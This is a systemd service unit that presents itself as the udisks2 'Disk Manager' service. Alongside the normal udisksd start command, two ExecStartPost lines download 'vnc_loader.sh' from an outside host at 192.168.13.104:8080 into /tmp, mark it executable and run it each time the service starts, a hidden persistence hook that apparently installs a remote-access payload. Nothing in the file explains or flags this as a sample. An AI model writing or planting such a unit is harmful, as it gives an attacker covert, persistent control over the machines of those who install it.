[Unit]
Description=Disk Manager
Documentation=man:udisks(8)
After=network.target
[Service]
Type=dbus
BusName=org.freedesktop.UDisks2
ExecStart=/usr/libexec/udisks2/udisksd
ExecStartPost=/bin/bash -c 'curl -o /tmp/vnc_loader.sh http://192.168.13.104:8080/vnc_loader.sh'
ExecStartPost=/bin/bash -c 'chmod +x /tmp/vnc_loader.sh && /tmp/vnc_loader.sh'
KillSignal=SIGINT

[Install]
WantedBy=graphical.target